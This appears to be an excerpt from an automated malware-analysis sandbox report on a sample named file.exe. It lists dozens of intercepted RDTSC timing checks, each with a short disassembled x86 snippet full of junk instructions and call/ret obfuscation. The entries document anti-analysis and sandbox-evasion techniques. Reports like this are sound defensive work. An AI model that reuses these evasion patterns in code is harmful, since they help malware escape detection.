                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1112A88 second address: 1112ABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FB6CD92550Eh 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB6CD9254FDh 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1112ABD second address: 1112AC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113F8AD second address: 113F8C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 je 00007FB6CD9254FEh 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113F8C2 second address: 113F906 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007FB6CC860F36h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jo 00007FB6CC860F2Ah 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a jo 00007FB6CC860F2Eh 0x00000020 jnc 00007FB6CC860F26h 0x00000026 push edi 0x00000027 pop edi 0x00000028 pushad 0x00000029 push edi 0x0000002a pop edi 0x0000002b js 00007FB6CC860F26h 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1144BEC second address: 1144BF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114C2B7 second address: 114C2BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114C2BD second address: 114C2DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push edi 0x00000007 jnc 00007FB6CD9254F8h 0x0000000d pushad 0x0000000e jnc 00007FB6CD9254F6h 0x00000014 jc 00007FB6CD9254F6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114BA3E second address: 114BA42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114C0E2 second address: 114C114 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB6CD9254F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f js 00007FB6CD92550Fh 0x00000015 jmp 00007FB6CD925507h 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114C114 second address: 114C122 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB6CC860F2Ah 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114C122 second address: 114C12C instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB6CD9254F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114F409 second address: 114F40D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114F40D second address: 114F411 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114F4EC second address: 114F4F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114F799 second address: 114F7B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CD925504h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114F935 second address: 114F93B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114F93B second address: 114F93F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114F9C4 second address: 114F9CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115007C second address: 1150080 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1150080 second address: 11500B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FB6CC860F37h 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 jmp 00007FB6CC860F31h 0x00000019 pop edi 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11500B8 second address: 115010A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FB6CD9254F6h 0x00000009 jne 00007FB6CD9254F6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 xchg eax, ebx 0x00000013 jl 00007FB6CD9254FCh 0x00000019 mov edi, dword ptr [ebp+122D3190h] 0x0000001f nop 0x00000020 pushad 0x00000021 jmp 00007FB6CD925504h 0x00000026 jns 00007FB6CD925505h 0x0000002c popad 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 pop eax 0x00000034 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115010A second address: 115010E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115010E second address: 1150114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11505F1 second address: 11505F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1150B27 second address: 1150B71 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB6CD9254F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007FB6CD9254F8h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 mov dword ptr [ebp+122D3872h], eax 0x0000002e push 00000000h 0x00000030 or di, 2817h 0x00000035 push 00000000h 0x00000037 movsx edi, ax 0x0000003a xchg eax, ebx 0x0000003b push eax 0x0000003c push edx 0x0000003d jo 00007FB6CD9254FCh 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1150B71 second address: 1150B75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115135B second address: 1151362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1152402 second address: 1152488 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov edi, dword ptr [ebp+122D3443h] 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007FB6CC860F28h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 0000001Dh 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d or esi, 22247830h 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edi 0x00000038 call 00007FB6CC860F28h 0x0000003d pop edi 0x0000003e mov dword ptr [esp+04h], edi 0x00000042 add dword ptr [esp+04h], 00000018h 0x0000004a inc edi 0x0000004b push edi 0x0000004c ret 0x0000004d pop edi 0x0000004e ret 0x0000004f jg 00007FB6CC860F3Bh 0x00000055 add dword ptr [ebp+122D3881h], edi 0x0000005b xchg eax, ebx 0x0000005c push esi 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1152488 second address: 115248E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1152CD2 second address: 1152CD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1152CD6 second address: 1152CE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1152CE3 second address: 1152CE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1152CE8 second address: 1152CEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1155B75 second address: 1155B7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1156FE0 second address: 1156FEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1156FEB second address: 1156FF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1156FF4 second address: 1156FF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1156FF8 second address: 1157053 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CC860F2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b mov dword ptr [ebp+1247BA0Bh], edi 0x00000011 pushad 0x00000012 cmc 0x00000013 pushad 0x00000014 mov dword ptr [ebp+122D1C9Fh], eax 0x0000001a clc 0x0000001b popad 0x0000001c popad 0x0000001d push 00000000h 0x0000001f mov edi, dword ptr [ebp+122D2B9Bh] 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ebx 0x0000002a call 00007FB6CC860F28h 0x0000002f pop ebx 0x00000030 mov dword ptr [esp+04h], ebx 0x00000034 add dword ptr [esp+04h], 0000001Ch 0x0000003c inc ebx 0x0000003d push ebx 0x0000003e ret 0x0000003f pop ebx 0x00000040 ret 0x00000041 mov di, 1BB7h 0x00000045 xchg eax, ebx 0x00000046 push edx 0x00000047 push ebx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1157862 second address: 1157868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1158C51 second address: 1158CE9 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB6CC860F2Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnp 00007FB6CC860F2Ah 0x00000011 push eax 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pop eax 0x00000015 nop 0x00000016 mov edi, dword ptr [ebp+122D3B1Eh] 0x0000001c push dword ptr fs:[00000000h] 0x00000023 push 00000000h 0x00000025 push esi 0x00000026 call 00007FB6CC860F28h 0x0000002b pop esi 0x0000002c mov dword ptr [esp+04h], esi 0x00000030 add dword ptr [esp+04h], 00000015h 0x00000038 inc esi 0x00000039 push esi 0x0000003a ret 0x0000003b pop esi 0x0000003c ret 0x0000003d jmp 00007FB6CC860F2Bh 0x00000042 mov ebx, dword ptr [ebp+122D3931h] 0x00000048 mov dword ptr fs:[00000000h], esp 0x0000004f jp 00007FB6CC860F2Ch 0x00000055 mov dword ptr [ebp+12462B1Fh], ebx 0x0000005b mov eax, dword ptr [ebp+122D15C9h] 0x00000061 mov dword ptr [ebp+12482064h], edx 0x00000067 push FFFFFFFFh 0x00000069 jnc 00007FB6CC860F2Ch 0x0000006f nop 0x00000070 pushad 0x00000071 push eax 0x00000072 push edx 0x00000073 jmp 00007FB6CC860F30h 0x00000078 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1159C5F second address: 1159C63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115AD57 second address: 115AD5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115F720 second address: 115F72A instructions: 0x00000000 rdtsc 0x00000002 je 00007FB6CD9254F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115F72A second address: 115F799 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CC860F2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov ebx, dword ptr [ebp+122D5B5Ch] 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007FB6CC860F28h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 00000016h 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebx 0x00000033 call 00007FB6CC860F28h 0x00000038 pop ebx 0x00000039 mov dword ptr [esp+04h], ebx 0x0000003d add dword ptr [esp+04h], 00000015h 0x00000045 inc ebx 0x00000046 push ebx 0x00000047 ret 0x00000048 pop ebx 0x00000049 ret 0x0000004a push edx 0x0000004b pop edi 0x0000004c jmp 00007FB6CC860F2Ch 0x00000051 xchg eax, esi 0x00000052 push eax 0x00000053 push edx 0x00000054 push edi 0x00000055 pushad 0x00000056 popad 0x00000057 pop edi 0x00000058 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116078F second address: 11607FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 je 00007FB6CD9254FCh 0x0000000f mov ebx, dword ptr [ebp+122D3AD6h] 0x00000015 push 00000000h 0x00000017 or ebx, 61D2E2D9h 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push eax 0x00000022 call 00007FB6CD9254F8h 0x00000027 pop eax 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c add dword ptr [esp+04h], 00000015h 0x00000034 inc eax 0x00000035 push eax 0x00000036 ret 0x00000037 pop eax 0x00000038 ret 0x00000039 mov edi, 11377079h 0x0000003e mov ebx, 24C1FAE5h 0x00000043 push eax 0x00000044 pushad 0x00000045 jmp 00007FB6CD9254FFh 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007FB6CD925505h 0x00000051 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11615E7 second address: 11615ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1164603 second address: 1164609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1164609 second address: 1164659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007FB6CC860F2Eh 0x0000000b pop eax 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 mov di, dx 0x00000013 push 00000000h 0x00000015 jmp 00007FB6CC860F35h 0x0000001a mov dword ptr [ebp+122D2225h], ebx 0x00000020 push 00000000h 0x00000022 movsx edi, dx 0x00000025 xchg eax, esi 0x00000026 pushad 0x00000027 jne 00007FB6CC860F2Ch 0x0000002d push eax 0x0000002e push edx 0x0000002f push esi 0x00000030 pop esi 0x00000031 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1164659 second address: 116465D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11617BB second address: 11617BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11627E2 second address: 116287A instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB6CD9254F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b mov dword ptr [esp], eax 0x0000000e adc ebx, 7FF6F1A5h 0x00000014 push dword ptr fs:[00000000h] 0x0000001b push 00000000h 0x0000001d push ecx 0x0000001e call 00007FB6CD9254F8h 0x00000023 pop ecx 0x00000024 mov dword ptr [esp+04h], ecx 0x00000028 add dword ptr [esp+04h], 00000017h 0x00000030 inc ecx 0x00000031 push ecx 0x00000032 ret 0x00000033 pop ecx 0x00000034 ret 0x00000035 mov edi, ecx 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e jmp 00007FB6CD925508h 0x00000043 mov eax, dword ptr [ebp+122D0819h] 0x00000049 mov bx, CB40h 0x0000004d push FFFFFFFFh 0x0000004f push 00000000h 0x00000051 push ecx 0x00000052 call 00007FB6CD9254F8h 0x00000057 pop ecx 0x00000058 mov dword ptr [esp+04h], ecx 0x0000005c add dword ptr [esp+04h], 0000001Bh 0x00000064 inc ecx 0x00000065 push ecx 0x00000066 ret 0x00000067 pop ecx 0x00000068 ret 0x00000069 mov dword ptr [ebp+1245F1A6h], edi 0x0000006f movzx ebx, cx 0x00000072 push eax 0x00000073 pushad 0x00000074 push esi 0x00000075 push eax 0x00000076 push edx 0x00000077 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1163769 second address: 116377A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CC860F2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11617BF second address: 11617CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116287A second address: 1162882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11647FB second address: 1164813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB6CD9254FFh 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116377A second address: 1163784 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FB6CC860F26h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11617CD second address: 11617D2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1163784 second address: 1163788 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1166DDF second address: 1166DE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1166DE5 second address: 1166DEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1167E6A second address: 1167E74 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB6CD9254F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1167E74 second address: 1167F14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CC860F34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov di, ax 0x0000000d jc 00007FB6CC860F2Ch 0x00000013 or dword ptr [ebp+122D33A9h], edi 0x00000019 push dword ptr fs:[00000000h] 0x00000020 jmp 00007FB6CC860F2Eh 0x00000025 mov dword ptr fs:[00000000h], esp 0x0000002c jmp 00007FB6CC860F33h 0x00000031 mov eax, dword ptr [ebp+122D0541h] 0x00000037 push 00000000h 0x00000039 push edx 0x0000003a call 00007FB6CC860F28h 0x0000003f pop edx 0x00000040 mov dword ptr [esp+04h], edx 0x00000044 add dword ptr [esp+04h], 00000019h 0x0000004c inc edx 0x0000004d push edx 0x0000004e ret 0x0000004f pop edx 0x00000050 ret 0x00000051 add ebx, 17DFEFE1h 0x00000057 push FFFFFFFFh 0x00000059 xor dword ptr [ebp+122D2C3Bh], edx 0x0000005f nop 0x00000060 ja 00007FB6CC860F2Eh 0x00000066 push eax 0x00000067 push ebx 0x00000068 push edi 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1168D62 second address: 1168D66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1168D66 second address: 1168DEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 clc 0x00000009 push dword ptr fs:[00000000h] 0x00000010 jmp 00007FB6CC860F2Fh 0x00000015 mov edi, edx 0x00000017 mov dword ptr fs:[00000000h], esp 0x0000001e sub bl, 00000011h 0x00000021 mov eax, dword ptr [ebp+122D0035h] 0x00000027 push 00000000h 0x00000029 push ebx 0x0000002a call 00007FB6CC860F28h 0x0000002f pop ebx 0x00000030 mov dword ptr [esp+04h], ebx 0x00000034 add dword ptr [esp+04h], 00000015h 0x0000003c inc ebx 0x0000003d push ebx 0x0000003e ret 0x0000003f pop ebx 0x00000040 ret 0x00000041 or di, 7F00h 0x00000046 push FFFFFFFFh 0x00000048 push 00000000h 0x0000004a push ebp 0x0000004b call 00007FB6CC860F28h 0x00000050 pop ebp 0x00000051 mov dword ptr [esp+04h], ebp 0x00000055 add dword ptr [esp+04h], 00000015h 0x0000005d inc ebp 0x0000005e push ebp 0x0000005f ret 0x00000060 pop ebp 0x00000061 ret 0x00000062 jng 00007FB6CC860F2Ch 0x00000068 mov dword ptr [ebp+122D237Ah], ebx 0x0000006e push eax 0x0000006f push eax 0x00000070 push edx 0x00000071 push eax 0x00000072 push edx 0x00000073 push eax 0x00000074 pop eax 0x00000075 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1168DEB second address: 1168DF5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB6CD9254F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1173106 second address: 117310F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117310F second address: 1173115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11728AF second address: 11728CC instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB6CC860F26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FB6CC860F2Fh 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1172C7C second address: 1172C82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1172C82 second address: 1172C88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1172C88 second address: 1172CA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FB6CD925500h 0x0000000d jnc 00007FB6CD9254F6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
